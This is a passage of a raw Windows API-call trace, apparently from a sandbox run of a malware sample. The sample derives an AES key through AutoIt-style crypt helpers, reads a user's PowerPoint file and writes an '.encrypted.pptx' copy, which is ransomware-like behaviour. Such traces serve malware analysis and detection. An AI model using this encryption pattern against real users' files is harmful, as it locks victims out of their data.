Flags=0x0, Size=0x8) returned 0x7da178 [0032.892] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.892] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.892] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0032.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.893] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.893] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.894] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.894] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.895] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.895] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xfc8e, lpOverlapped=0x0) returned 1 [0032.897] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfc8e) returned 0x955018 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.902] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfc8e) returned 0x955018 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfc8e) returned 0x88ffb0 [0032.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.904] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.905] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.905] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.905] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.905] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.905] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.906] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.906] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.906] PeekMessageW (in: 